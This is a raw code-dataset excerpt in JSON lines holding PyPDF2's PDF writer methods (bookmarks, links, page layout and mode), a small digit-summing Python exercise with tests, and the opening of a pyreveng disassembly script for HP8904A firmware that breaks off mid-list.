cast(TreeObject, parent.get_object())\n parent.add_child(dest_ref, self)\n\n return dest_ref\n\n def addBookmarkDestination(\n self, dest: PageObject, parent: Optional[TreeObject] = None\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_bookmark_destination` instead.\n \"\"\"\n deprecate_with_replacement(\"addBookmarkDestination\", \"add_bookmark_destination\")\n return self.add_bookmark_destination(dest, parent)\n\n def add_bookmark_dict(\n self, bookmark: BookmarkTypes, parent: Optional[TreeObject] = None\n ) -> IndirectObject:\n bookmark_obj = TreeObject()\n for k, v in list(bookmark.items()):\n bookmark_obj[NameObject(str(k))] = v\n bookmark_obj.update(bookmark)\n\n if \"/A\" in bookmark:\n action = DictionaryObject()\n a_dict = cast(DictionaryObject, bookmark[\"/A\"])\n for k, v in list(a_dict.items()):\n action[NameObject(str(k))] = v\n action_ref = self._add_object(action)\n bookmark_obj[NameObject(\"/A\")] = action_ref\n\n bookmark_ref = self._add_object(bookmark_obj)\n\n outline_ref = self.get_outline_root()\n\n if parent is None:\n parent = outline_ref\n\n parent = parent.get_object() # type: ignore\n assert parent is not None, \"hint for mypy\"\n parent.add_child(bookmark_ref, self)\n\n return bookmark_ref\n\n def addBookmarkDict(\n self, bookmark: BookmarkTypes, parent: Optional[TreeObject] = None\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n Use :meth:`add_bookmark_dict` instead.\n \"\"\"\n deprecate_with_replacement(\"addBookmarkDict\", \"add_bookmark_dict\")\n return self.add_bookmark_dict(bookmark, parent)\n\n def add_bookmark(\n self,\n title: str,\n pagenum: int,\n parent: Union[None, TreeObject, IndirectObject] = None,\n color: Optional[Tuple[float, float, float]] = None,\n bold: bool = False,\n italic: bool = False,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> IndirectObject:\n \"\"\"\n Add a bookmark to this PDF file.\n\n :param str title: Title to use for this bookmark.\n :param int pagenum: Page number this bookmark will point to.\n :param parent: A reference to a parent bookmark to create nested\n bookmarks.\n :param tuple color: Color of the bookmark as a red, green, blue tuple\n from 0.0 to 1.0\n :param bool bold: Bookmark is bold\n :param bool italic: Bookmark is italic\n :param str fit: The fit of the destination page. See\n :meth:`addLink()` for details.\n \"\"\"\n page_ref = NumberObject(pagenum)\n action = DictionaryObject()\n zoom_args: ZoomArgsType = []\n for a in args:\n if a is not None:\n zoom_args.append(NumberObject(a))\n else:\n zoom_args.append(NullObject())\n dest = Destination(\n NameObject(\"/\" + title + \" bookmark\"), page_ref, NameObject(fit), *zoom_args\n )\n dest_array = dest.dest_array\n action.update(\n {NameObject(\"/D\"): dest_array, NameObject(\"/S\"): NameObject(\"/GoTo\")}\n )\n action_ref = self._add_object(action)\n\n outline_ref = self.get_outline_root()\n\n if parent is None:\n parent = outline_ref\n\n bookmark = _create_bookmark(action_ref, title, color, italic, bold)\n\n bookmark_ref = self._add_object(bookmark)\n\n assert parent is not None, \"hint for mypy\"\n parent_obj = cast(TreeObject, parent.get_object())\n parent_obj.add_child(bookmark_ref, self)\n\n return bookmark_ref\n\n def addBookmark(\n self,\n title: str,\n pagenum: int,\n parent: Union[None, TreeObject, IndirectObject] = None,\n color: Optional[Tuple[float, float, float]] = None,\n bold: bool = False,\n italic: bool = False,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_bookmark` instead.\n \"\"\"\n deprecate_with_replacement(\"addBookmark\", \"add_bookmark\")\n return self.add_bookmark(\n title, pagenum, parent, color, bold, italic, fit, *args\n )\n\n def add_named_destination_object(self, dest: PdfObject) -> IndirectObject:\n dest_ref = self._add_object(dest)\n\n nd = self.get_named_dest_root()\n nd.extend([dest[\"/Title\"], dest_ref]) # type: ignore\n return dest_ref\n\n def addNamedDestinationObject(\n self, dest: PdfObject\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n Use :meth:`add_named_destination_object` instead.\n \"\"\"\n deprecate_with_replacement(\n \"addNamedDestinationObject\", \"add_named_destination_object\"\n )\n return self.add_named_destination_object(dest)\n\n def add_named_destination(self, title: str, pagenum: int) -> IndirectObject:\n page_ref = self.get_object(self._pages)[PA.KIDS][pagenum] # type: ignore\n dest = DictionaryObject()\n dest.update(\n {\n NameObject(\"/D\"): ArrayObject(\n [page_ref, NameObject(\"/FitH\"), NumberObject(826)]\n ),\n NameObject(\"/S\"): NameObject(\"/GoTo\"),\n }\n )\n\n dest_ref = self._add_object(dest)\n nd = self.get_named_dest_root()\n nd.extend([title, dest_ref])\n return dest_ref\n\n def addNamedDestination(\n self, title: str, pagenum: int\n ) -> IndirectObject: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_named_destination` instead.\n \"\"\"\n deprecate_with_replacement(\"addNamedDestination\", \"add_named_destination\")\n return self.add_named_destination(title, pagenum)\n\n def remove_links(self) -> None:\n \"\"\"Remove links and annotations from this output.\"\"\"\n pg_dict = cast(DictionaryObject, self.get_object(self._pages))\n pages = cast(ArrayObject, pg_dict[PA.KIDS])\n for page in pages:\n page_ref = cast(DictionaryObject, self.get_object(page))\n if PG.ANNOTS in page_ref:\n del page_ref[PG.ANNOTS]\n\n def removeLinks(self) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`remove_links` instead.\n \"\"\"\n deprecate_with_replacement(\"removeLinks\", \"remove_links\")\n return self.remove_links()\n\n def remove_images(self, ignore_byte_string_object: bool = False) -> None:\n \"\"\"\n Remove images from this output.\n\n :param bool ignore_byte_string_object: optional parameter\n to ignore ByteString Objects.\n \"\"\"\n pg_dict = cast(DictionaryObject, self.get_object(self._pages))\n pages = cast(ArrayObject, pg_dict[PA.KIDS])\n jump_operators = (\n b\"cm\",\n b\"w\",\n b\"J\",\n b\"j\",\n b\"M\",\n b\"d\",\n b\"ri\",\n b\"i\",\n b\"gs\",\n b\"W\",\n b\"b\",\n b\"s\",\n b\"S\",\n b\"f\",\n b\"F\",\n b\"n\",\n b\"m\",\n b\"l\",\n b\"c\",\n b\"v\",\n b\"y\",\n b\"h\",\n b\"B\",\n b\"Do\",\n b\"sh\",\n )\n for page in pages:\n page_ref = cast(DictionaryObject, self.get_object(page))\n content = page_ref[\"/Contents\"].get_object()\n if not isinstance(content, ContentStream):\n content = ContentStream(content, page_ref)\n\n _operations = []\n seq_graphics = False\n for operands, operator in content.operations:\n if operator in [b\"Tj\", b\"'\"]:\n text = operands[0]\n if ignore_byte_string_object and not isinstance(\n text, TextStringObject\n ):\n operands[0] = TextStringObject()\n elif operator == b'\"':\n text = operands[2]\n if ignore_byte_string_object and not isinstance(\n text, TextStringObject\n ):\n operands[2] = TextStringObject()\n elif operator == b\"TJ\":\n for i in range(len(operands[0])):\n if ignore_byte_string_object and not isinstance(\n operands[0][i], TextStringObject\n ):\n operands[0][i] = TextStringObject()\n\n if operator == b\"q\":\n seq_graphics = True\n if operator == b\"Q\":\n seq_graphics = False\n if seq_graphics and operator in jump_operators:\n continue\n if operator == b\"re\":\n continue\n _operations.append((operands, operator))\n\n content.operations = _operations\n page_ref.__setitem__(NameObject(\"/Contents\"), content)\n\n def removeImages(\n self, ignoreByteStringObject: bool = False\n ) -> None: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n Use :meth:`remove_images` instead.\n \"\"\"\n deprecate_with_replacement(\"removeImages\", \"remove_images\")\n return self.remove_images(ignoreByteStringObject)\n\n def remove_text(self, ignore_byte_string_object: bool = False) -> None:\n \"\"\"\n Remove text from this output.\n\n :param bool ignore_byte_string_object: optional parameter\n to ignore ByteString Objects.\n \"\"\"\n pg_dict = cast(DictionaryObject, self.get_object(self._pages))\n pages = cast(List[IndirectObject], pg_dict[PA.KIDS])\n for page in pages:\n page_ref = cast(Dict[str, Any], self.get_object(page))\n content = page_ref[\"/Contents\"].get_object()\n if not isinstance(content, ContentStream):\n content = ContentStream(content, page_ref)\n for operands, operator in content.operations:\n if operator in [b\"Tj\", b\"'\"]:\n text = operands[0]\n if not ignore_byte_string_object:\n if isinstance(text, TextStringObject):\n operands[0] = TextStringObject()\n else:\n if isinstance(text, (TextStringObject, ByteStringObject)):\n operands[0] = TextStringObject()\n elif operator == b'\"':\n text = operands[2]\n if not ignore_byte_string_object:\n if isinstance(text, TextStringObject):\n operands[2] = TextStringObject()\n else:\n if isinstance(text, (TextStringObject, ByteStringObject)):\n operands[2] = TextStringObject()\n elif operator == b\"TJ\":\n for i in range(len(operands[0])):\n if not ignore_byte_string_object:\n if isinstance(operands[0][i], TextStringObject):\n operands[0][i] = TextStringObject()\n else:\n if isinstance(\n operands[0][i], (TextStringObject, ByteStringObject)\n ):\n operands[0][i] = TextStringObject()\n\n page_ref.__setitem__(NameObject(\"/Contents\"), content)\n\n def removeText(\n self, ignoreByteStringObject: bool = False\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`remove_text` instead.\n \"\"\"\n deprecate_with_replacement(\"removeText\", \"remove_text\")\n return self.remove_text(ignoreByteStringObject)\n\n def add_uri(\n self,\n pagenum: int,\n uri: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n ) -> None:\n \"\"\"\n Add an URI from a rectangular area to the specified page.\n This uses the basic structure of :meth:`add_link`\n\n :param int pagenum: index of the page on which to place the URI action.\n :param int uri: string -- uri of resource to link to.\n :param rect: :class:`RectangleObject` or array of four\n integers specifying the clickable rectangular area\n ``[xLL, yLL, xUR, yUR]``, or string in the form ``\"[ xLL yLL xUR yUR ]\"``.\n :param border: if provided, an array describing border-drawing\n properties. See the PDF spec for details. 
No border will be\n drawn if this argument is omitted.\n \"\"\"\n\n page_link = self.get_object(self._pages)[PA.KIDS][pagenum] # type: ignore\n page_ref = cast(Dict[str, Any], self.get_object(page_link))\n\n border_arr: BorderArrayType\n if border is not None:\n border_arr = [NameObject(n) for n in border[:3]]\n if len(border) == 4:\n dash_pattern = ArrayObject([NameObject(n) for n in border[3]])\n border_arr.append(dash_pattern)\n else:\n border_arr = [NumberObject(2)] * 3\n\n if isinstance(rect, str):\n rect = NameObject(rect)\n elif isinstance(rect, RectangleObject):\n pass\n else:\n rect = RectangleObject(rect)\n\n lnk2 = DictionaryObject()\n lnk2.update(\n {\n NameObject(\"/S\"): NameObject(\"/URI\"),\n NameObject(\"/URI\"): TextStringObject(uri),\n }\n )\n lnk = DictionaryObject()\n lnk.update(\n {\n NameObject(\"/Type\"): NameObject(PG.ANNOTS),\n NameObject(\"/Subtype\"): NameObject(\"/Link\"),\n NameObject(\"/P\"): page_link,\n NameObject(\"/Rect\"): rect,\n NameObject(\"/H\"): NameObject(\"/I\"),\n NameObject(\"/Border\"): ArrayObject(border_arr),\n NameObject(\"/A\"): lnk2,\n }\n )\n lnk_ref = self._add_object(lnk)\n\n if PG.ANNOTS in page_ref:\n page_ref[PG.ANNOTS].append(lnk_ref)\n else:\n page_ref[NameObject(PG.ANNOTS)] = ArrayObject([lnk_ref])\n\n def addURI(\n self,\n pagenum: int,\n uri: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n ) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_uri` instead.\n \"\"\"\n deprecate_with_replacement(\"addURI\", \"add_uri\")\n return self.add_uri(pagenum, uri, rect, border)\n\n def add_link(\n self,\n pagenum: int,\n pagedest: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> None:\n \"\"\"\n Add an internal link from a rectangular area to the specified page.\n\n :param int pagenum: index of the page on which to place the link.\n :param int pagedest: index of the page to which the link should go.\n :param rect: :class:`RectangleObject` or array of four\n integers specifying the clickable rectangular area\n ``[xLL, yLL, xUR, yUR]``, or string in the form ``\"[ xLL yLL xUR yUR ]\"``.\n :param border: if provided, an array describing border-drawing\n properties. See the PDF spec for details. No border will be\n drawn if this argument is omitted.\n :param str fit: Page fit or 'zoom' option (see below). Additional arguments may need\n to be supplied. Passing ``None`` will be read as a null value for that coordinate.\n\n .. 
list-table:: Valid ``zoom`` arguments (see Table 8.2 of the PDF 1.7 reference for details)\n :widths: 50 200\n\n * - /Fit\n - No additional arguments\n * - /XYZ\n - [left] [top] [zoomFactor]\n * - /FitH\n - [top]\n * - /FitV\n - [left]\n * - /FitR\n - [left] [bottom] [right] [top]\n * - /FitB\n - No additional arguments\n * - /FitBH\n - [top]\n * - /FitBV\n - [left]\n \"\"\"\n pages_obj = cast(Dict[str, Any], self.get_object(self._pages))\n page_link = pages_obj[PA.KIDS][pagenum]\n page_dest = pages_obj[PA.KIDS][pagedest] # TODO: switch for external link\n page_ref = cast(Dict[str, Any], self.get_object(page_link))\n\n border_arr: BorderArrayType\n if border is not None:\n border_arr = [NameObject(n) for n in border[:3]]\n if len(border) == 4:\n dash_pattern = ArrayObject([NameObject(n) for n in border[3]])\n border_arr.append(dash_pattern)\n else:\n border_arr = [NumberObject(0)] * 3\n\n if isinstance(rect, str):\n rect = NameObject(rect)\n elif isinstance(rect, RectangleObject):\n pass\n else:\n rect = RectangleObject(rect)\n\n zoom_args: ZoomArgsType = []\n for a in args:\n if a is not None:\n zoom_args.append(NumberObject(a))\n else:\n zoom_args.append(NullObject())\n dest = Destination(\n NameObject(\"/LinkName\"), page_dest, NameObject(fit), *zoom_args\n ) # TODO: create a better name for the link\n dest_array = dest.dest_array\n\n lnk = DictionaryObject()\n lnk.update(\n {\n NameObject(\"/Type\"): NameObject(PG.ANNOTS),\n NameObject(\"/Subtype\"): NameObject(\"/Link\"),\n NameObject(\"/P\"): page_link,\n NameObject(\"/Rect\"): rect,\n NameObject(\"/Border\"): ArrayObject(border_arr),\n NameObject(\"/Dest\"): dest_array,\n }\n )\n lnk_ref = self._add_object(lnk)\n\n if PG.ANNOTS in page_ref:\n page_ref[PG.ANNOTS].append(lnk_ref)\n else:\n page_ref[NameObject(PG.ANNOTS)] = ArrayObject([lnk_ref])\n\n def addLink( # pragma: no cover\n self,\n pagenum: int,\n pagedest: int,\n rect: RectangleObject,\n border: Optional[ArrayObject] = None,\n fit: FitType = \"/Fit\",\n *args: ZoomArgType,\n ) -> None:\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :meth:`add_link` instead.\n \"\"\"\n deprecate_with_replacement(\"addLink\", \"add_link\")\n return self.add_link(pagenum, pagedest, rect, border, fit, *args)\n\n _valid_layouts = (\n \"/NoLayout\",\n \"/SinglePage\",\n \"/OneColumn\",\n \"/TwoColumnLeft\",\n \"/TwoColumnRight\",\n \"/TwoPageLeft\",\n \"/TwoPageRight\",\n )\n\n def _get_page_layout(self) -> Optional[LayoutType]:\n try:\n return cast(LayoutType, self._root_object[\"/PageLayout\"])\n except KeyError:\n return None\n\n def getPageLayout(self) -> Optional[LayoutType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\"getPageLayout\", \"page_layout\")\n return self._get_page_layout()\n\n def _set_page_layout(self, layout: Union[NameObject, LayoutType]) -> None:\n \"\"\"\n Set the page layout.\n\n :param str layout: The page layout to be used.\n\n .. 
list-table:: Valid ``layout`` arguments\n :widths: 50 200\n\n * - /NoLayout\n - Layout explicitly not specified\n * - /SinglePage\n - Show one page at a time\n * - /OneColumn\n - Show one column at a time\n * - /TwoColumnLeft\n - Show pages in two columns, odd-numbered pages on the left\n * - /TwoColumnRight\n - Show pages in two columns, odd-numbered pages on the right\n * - /TwoPageLeft\n - Show two pages at a time, odd-numbered pages on the left\n * - /TwoPageRight\n - Show two pages at a time, odd-numbered pages on the right\n \"\"\"\n if not isinstance(layout, NameObject):\n if layout not in self._valid_layouts:\n warnings.warn(\n f\"Layout should be one of: {', '.join(self._valid_layouts)}\"\n )\n layout = NameObject(layout)\n self._root_object.update({NameObject(\"/PageLayout\"): layout})\n\n def setPageLayout(self, layout: LayoutType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\n \"writer.setPageLayout(val)\", \"writer.page_layout = val\"\n )\n return self._set_page_layout(layout)\n\n @property\n def page_layout(self) -> Optional[LayoutType]:\n \"\"\"\n Page layout property.\n\n .. list-table:: Valid ``layout`` values\n :widths: 50 200\n\n * - /NoLayout\n - Layout explicitly not specified\n * - /SinglePage\n - Show one page at a time\n * - /OneColumn\n - Show one column at a time\n * - /TwoColumnLeft\n - Show pages in two columns, odd-numbered pages on the left\n * - /TwoColumnRight\n - Show pages in two columns, odd-numbered pages on the right\n * - /TwoPageLeft\n - Show two pages at a time, odd-numbered pages on the left\n * - /TwoPageRight\n - Show two pages at a time, odd-numbered pages on the right\n \"\"\"\n return self._get_page_layout()\n\n @page_layout.setter\n def page_layout(self, layout: LayoutType) -> None:\n self._set_page_layout(layout)\n\n @property\n def pageLayout(self) -> Optional[LayoutType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\"pageLayout\", \"page_layout\")\n return self.page_layout\n\n @pageLayout.setter\n def pageLayout(self, layout: LayoutType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_layout` instead.\n \"\"\"\n deprecate_with_replacement(\"pageLayout\", \"page_layout\")\n self.page_layout = layout\n\n _valid_modes = (\n \"/UseNone\",\n \"/UseOutlines\",\n \"/UseThumbs\",\n \"/FullScreen\",\n \"/UseOC\",\n \"/UseAttachments\",\n )\n\n def _get_page_mode(self) -> Optional[PagemodeType]:\n try:\n return cast(PagemodeType, self._root_object[\"/PageMode\"])\n except KeyError:\n return None\n\n def getPageMode(self) -> Optional[PagemodeType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"getPageMode\", \"page_mode\")\n return self._get_page_mode()\n\n def set_page_mode(self, mode: PagemodeType) -> None:\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n if isinstance(mode, NameObject):\n mode_name: NameObject = mode\n else:\n if mode not in self._valid_modes:\n warnings.warn(f\"Mode should be one of: {', '.join(self._valid_modes)}\")\n mode_name = NameObject(mode)\n self._root_object.update({NameObject(\"/PageMode\"): mode_name})\n\n def setPageMode(self, mode: PagemodeType) -> None: # pragma: no cover\n \"\"\"\n .. 
deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"writer.setPageMode(val)\", \"writer.page_mode = val\")\n self.set_page_mode(mode)\n\n @property\n def page_mode(self) -> Optional[PagemodeType]:\n \"\"\"\n Page mode property.\n\n .. list-table:: Valid ``mode`` values\n :widths: 50 200\n\n * - /UseNone\n - Do not show outlines or thumbnails panels\n * - /UseOutlines\n - Show outlines (aka bookmarks) panel\n * - /UseThumbs\n - Show page thumbnails panel\n * - /FullScreen\n - Fullscreen view\n * - /UseOC\n - Show Optional Content Group (OCG) panel\n * - /UseAttachments\n - Show attachments panel\n \"\"\"\n return self._get_page_mode()\n\n @page_mode.setter\n def page_mode(self, mode: PagemodeType) -> None:\n self.set_page_mode(mode)\n\n @property\n def pageMode(self) -> Optional[PagemodeType]: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"pageMode\", \"page_mode\")\n return self.page_mode\n\n @pageMode.setter\n def pageMode(self, mode: PagemodeType) -> None: # pragma: no cover\n \"\"\"\n .. deprecated:: 1.28.0\n\n Use :py:attr:`page_mode` instead.\n \"\"\"\n deprecate_with_replacement(\"pageMode\", \"page_mode\")\n self.page_mode = mode\n\n\nclass PdfFileWriter(PdfWriter): # pragma: no cover\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n deprecate_with_replacement(\"PdfFileWriter\", \"PdfWriter\")\n super().__init__(*args, **kwargs)\n","sub_path":"PyPDF2/_writer.py","file_name":"_writer.py","file_ext":"py","file_size_in_byte":64065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"335760555","text":"def number_addition(str):\n sum = 0\n i = 0\n while i < len(str):\n if str[i].isdigit():\n j = i + 1\n while j < len(str) and str[j].isdigit():\n j += 1\n digit = int(str[i:j])\n sum += digit\n i = j + 1\n else:\n i += 1\n return sum\n\nprint(\"number_addition tests\")\ntests = [( \"88Hello 3World!\", 91), (\"75Number9\", 84), (\"10 2One Number*1*\", 13)]\nfor test in tests:\n result = number_addition(test[0])\n if result == test[1]:\n print(\"PASS: %d\" % result)\n else:\n print(\"FAIL: %d\" % result)","sub_path":"easy/number_addition.py","file_name":"number_addition.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"97838608","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2012-2014 Poul-Henning Kamp \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGE.\n\nfrom __future__ import print_function\n\nimport os\nfrom pyreveng import job, mem, listing, data, code, assy\nimport pyreveng.cpu.mc6809 as mc6809\n\nfwd=\"/critter/Doc/TestAndMeasurement/HP8904A/FW/\"\n\n#######################################################################\n# The HP8904A has five memory pages, four of which occupy the same\n# address space. We analyse them separately.\n\ndef setup(pg=4):\n\tif pg < 4:\n\t\tm = mem.byte_mem(0x4000, 0x8000)\n\t\tfi = open(fwd + \"/08904-87008.hex\")\n\t\tfor i in fi:\n\t\t\tj = i.split()\n\t\t\tif int(j[0],10) == pg:\n\t\t\t\tm.wr(int(j[1],16), int(j[2],16))\n\t\tfi.close()\n\telse:\n\t\tm = mem.byte_mem(0x8000, 0x10000)\n\t\tm.load_binfile(0x8000, 1, fwd + \"08904-87007.bin\")\n\n\tpj = job.Job(m, \"HP8904A_pg%d\" % pg)\n\tpj.pg = pg\n\treturn pj,m\n\n#######################################################################\n\nhpib = {\n\t\"AHR\":\t\"Amplitude Hop\",\n\t\"DPE\":\t\"Digital Port\",\n\t\"FRH\":\t\"Frequency Hop Mode\",\n\t\"FHR\":\t\"Frequency Hop\",\n\t\"HRA\":\t\"Hop Register\",\n\t\"PHH\":\t\"Phase Hop Mode\",\n\t\"PHR\":\t\"Phase Hop\",\n\t\"QRE\":\t\"Query Port Status\",\n\t\"LO\":\t\"Gaussian Filter\",\n\t\"SH\":\t\"Sharp Filter\",\n\t\"AU\":\t\"Auto Filter\",\n\t\"SI\":\t\"Sine\",\n\t\"RA\":\t\"Ramp\",\n\t\"TR\":\t\"Triangle\",\n\t\"SQ\":\t\"Square\",\n\t\"NS\":\t\"Noise\",\n\t\"DC\":\t\"DC\",\n\t\"KZ\":\t\"kHz\",\n\t\"HZ\":\t\"Hz\",\n\t\"DG\":\t\"Degrees\",\n\t\"RD\":\t\"Radians\",\n\t\"VL\":\t\"Volts\",\n\t\"MV\":\t\"Millivolts\",\n\t\"UV\":\t\"Microvolts\",\n\t\"ET\":\t\"Enter\",\n\t\"SC\":\t\"Seconds\",\n\t\"MS\":\t\"Milliseconds\",\n\t\"PC\":\t\"Percent\",\n\t\"UP\":\t\"Increment Up\",\n\t\"DN\":\t\"Increment Down\",\n\t\"SEQE\":\t\"Sequence end\",\n\t\"SEQP\":\t\"Sequence index\",\n\t\"WSQ\":\t\"Sequence string\",\n\t\"FRH\":\t\"Tone Frequency\",\n\t\"RUNC\":\t\"Run cont.\",\n\t\"RUNM\": \"Run man.\",\n\t\"RUNS\":\t\"Run single\",\n\t\"STOP\":\t\"Stop Run mode\",\n\t\"AM\":\t\"AM mod.\",\n\t\"FM\":\t\"FM mod.\",\n\t\"PM\":\t\"PM mod.\",\n\t\"DS\":\t\"DSB mod.\",\n\t\"PU\":\t\"Pulse mod.\",\n\t\"APH\":\t\"Tone/DTMF Amplitude\",\n\t\"DAPH\":\t\"Dig.Seq. On Level\",\n\t\"DAPL\":\t\"Dig.Seq. Off Level\",\n\t\"BSB\":\t\"Dig.Seq. Binary Base\",\n\t\"BSO\":\t\"Dig.Seq. Octal Base\",\n\t\"BSH\":\t\"Dig.Seq. Hex Base\",\n\t\"STOF\":\t\"Tone/DTMF Off time\",\n\t\"STON\":\t\"Tone/DTMF On time\",\n\t\"SBP\":\t\"Dig.Seq. 
Period\",\n\t\"HRA\":\t\"Tone/DTMF Register Number\",\n\t\"APA\":\t\"Amplitude A\",\n\t\"APB\":\t\"Amplitude B\",\n\t\"APC\":\t\"Amplitude C\",\n\t\"APD\":\t\"Amplitude D\",\n\t\"BO\":\t\"Backlight On\",\n\t\"BF\":\t\"Backlight Off\",\n\t\"BP\":\t\"Beep\",\n\t\"DEA\":\t\"Destination\",\n\t\"DEB\":\t\"Destination\",\n\t\"DEC\":\t\"Destination\",\n\t\"DED\":\t\"Destination\",\n\t\"EM\":\t\"Exit\",\n\t\"FS\":\t\"Filter\",\n\t\"FC\":\t\"Float Control\",\n\t\"FRA\":\t\"Frequency\",\n\t\"FRB\":\t\"Frequency\",\n\t\"FRC\":\t\"Frequency\",\n\t\"FRD\":\t\"Frequency\",\n\t\"GM\":\t\"Goto Mode\",\n\t\"HP\":\t\"Help\",\n\t\"ID\":\t\"Id\",\n\t\"IS\":\t\"Increment Set\",\n\t\"OF\":\t\"Off\",\n\t\"ON\":\t\"On\",\n\t\"OO\":\t\"Output Control\",\n\t\"PHA\":\t\"Phase\",\n\t\"PHB\":\t\"Phase\",\n\t\"PHC\":\t\"Phase\",\n\t\"PHD\":\t\"Phase\",\n\t\"PR\":\t\"Phase Reset\",\n\t\"PS\":\t\"Instrument Preset\",\n\t\"RC\":\t\"Recall\",\n\t\"RP\":\t\"Reverse Power\",\n\t\"SV\":\t\"Save\",\n\t\"RM\":\t\"Read Service Req Mask\",\n\t\"SM\":\t\"Set Service Req Mask\",\n\t\"SF\":\t\"Special Function\",\n\t\"RSF\":\t\"Read Special Function\",\n\t\"EO\":\t\"Read External Reference Status\",\n\t\"WFA\":\t\"Waveform\",\n\t\"WFB\":\t\"Waveform\",\n\t\"WFC\":\t\"Waveform\",\n\t\"WFD\":\t\"Waveform\",\n}\n\n#######################################################################\n\ndef symb(pj, cpu):\n\tfor p,a,n in [\n\t\t(0, 0x4018, \"MAIN_MENUS\"),\n\t\t(0, 0x43bd, \"HOP_RAM_ADRS\"),\n\t\t(0, 0x4908, \"HOP_CFG\"),\n\t\t(0, 0x4ed8, \"0x4ed8\"),\t\t# @0:54cb -> 3b85\n\t\t(0, 0x51e3, \"0x51e3\"),\t\t# @1:55bc -> 2213\n\t\t(0, 0x5253, \"0x5253\"),\t\t# @0:54d1 -> 2213\n\t\t(0, 0x5d0c, \"0x5d0c\"),\t\t# @0:54bf -> 220f\n\n\t\t(1, 0x42d1, \"0x42d1\"),\t\t# @1:6cc4\n\t\t(1, 0x444c, \"0x444c\"),\t\t# @1:6cb1\n\t\t(1, 0x4567, \"0x4567\"),\t\t# @1:5517\n\t\t(1, 0x4c01, \"0x4c01\"),\t\t# @1:550b -> 220f\n\t\t(1, 0x5185, \"0x5185\"),\t\t# @1:5511 -> 2211\n\t\t(1, 0x51e3, \"0x51e3\"),\t\t# @1:55bf -> 2213\n\t\t(1, 0x55c5, \"APP_TONE\"),\n\t\t(1, 0x7870, \"0x7870\"),\t\t# @1:79e5\n\t\t(1, 0x7a81, \"APP_DTMF\"),\n\t\t(1, 0x47fa, \"TONE_NBR\"),\n\t\t(1, 0x4842, \"TONE_ON_TIME\"),\n\t\t(1, 0x492c, \"TONE_F3\"),\n\t\t(1, 0x4860, \"TONE_OFF_TIME\"),\n\t\t(1, 0x71b4, \"TSEQ_INDEX\"),\n\t\t(1, 0x726a, \"TSEQ_HEX\"),\n\t\t(1, 0x7203, \"TSEQ_EDIT\"),\n\t\t(1, 0x71de, \"TSEQ_END\"),\n\t\t(1, 0x49ee, \"TSEQ_NBR\"),\n\t\t(1, 0x4a19, \"TSEQ_CONT\"),\n\t\t(1, 0x4aa2, \"TSEQ_SINGLE\"),\n\t\t(1, 